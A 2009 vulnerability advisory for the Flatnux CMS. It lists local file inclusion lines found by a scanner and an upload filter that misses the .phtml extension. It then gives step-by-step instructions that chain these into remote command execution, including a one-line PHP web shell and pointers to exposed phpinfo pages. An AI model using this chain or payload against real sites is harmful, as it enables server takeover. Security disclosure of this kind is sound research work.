Author: girex
Date: 17/04/2009
CMS: flatnux-2009-03-27
Bugs: Multiple remote vulnerabilities
Flatnux suffers of multiple local file inclusions: (output of my scanner)
Line: 10
File: D:/xampp/htdocs/flat/flatnux/sections/00_News/admin.php
Line: 6
File: D:/xampp/htdocs/flat/flatnux/sections/02_Flatforum/search.php
include ("sections/$module/config.php");
Line: 8
File: D:/xampp/htdocs/flat/flatnux/sections/06_Download/section.php
include ("sections/$_FNVMOD/config.php");
Line: 3
File: D:/xampp/htdocs/flat/flatnux/sections/08_Files/search.php
include ("sections/$module/config.php");
Line: 30
File: D:/xampp/htdocs/flat/flatnux/sections/10_Login/section.php
include ("sections/{$_FN['vmod']}/config.php");
Line: 14
File: D:/xampp/htdocs/flat/flatnux/sections/none_Control_Center/section.php
require_once ("sections/{$_FN['vmod']}/cc_functions.php");
Line: 2
File: D:/xampp/htdocs/flat/flatnux/themes/tp_alpha/theme.php
include ("themes/{$_FN['theme']}/config.php");
Line: 2
File: D:/xampp/htdocs/flat/flatnux/themes/tp_dhtml2/theme.php
include ("themes/{$_FN['theme']}/config.php");
Line: 2
File: D:/xampp/htdocs/flat/flatnux/themes/tp_green/theme.php
include ("themes/{$_FN['theme']}/config.php");
Now see...
File: /include/xmldb.php - Lines: 433-447
if (isset ($_FILES[$key]['tmp_name']) && $_FILES[$key]['tmp_name'] != "")
if (eregi('.php', $_FILES["$key"]['name']) || eregi('.php3', $_FILES["$key"]['name']) || eregi('.php4', $_FILES["$key"]['name']) || eregi('.php5', $_FILES["$key"]['name'])) <==
touch("$path/$databasename/$tablename/$unirecid/$key/" . $_FILES["$key"]['name']);
if (!file_exists("$path/$databasename/$tablename/$unirecid"))
if (!file_exists("$path/$databasename/$tablename/$unirecid/$key"))
move_uploaded_file(realpath($_FILES[$key]['tmp_name']), "$path/$databasename/$tablename/$unirecid/$key/" . $_FILES["$key"]['name']); <==
As you can see the script checks for .php .php3/4/5 extensions but what about
.phtml extension?
Depending of web server configuration .phtml can be interpreted as php code.
To upload a file you need a valid login.
You can get the upload module at the URLs:
- /path/index.php?mod=08_Files
where 08 is the default number but it can be different (max 20 i think)
- /path/index.php?mod=none_Files
Remember that you need aùto be authenticated.
Now upload your shell with .phtml extension and retrieve its link.
If the web server does not interprets .phtml files as php files you can
upload a .txt file with malicious code (ex <? system($cmd);?>)
And include it with one of local file inclusions reported before.
So you can obtain a Remote Command Execution depending of php.ini configuration becouse lfi's works with:
register_globals = On
magic_quotes_gpc = Off
Too see the php.ini configuration you can use this phpinfo() disclosure:
- /path/sections/none_Control_Center/phpinfo.php
- /path/sections/10_Control_Center/phpinfo.php
where 10 can be different number (max 20 i think)
# [2009-04-20]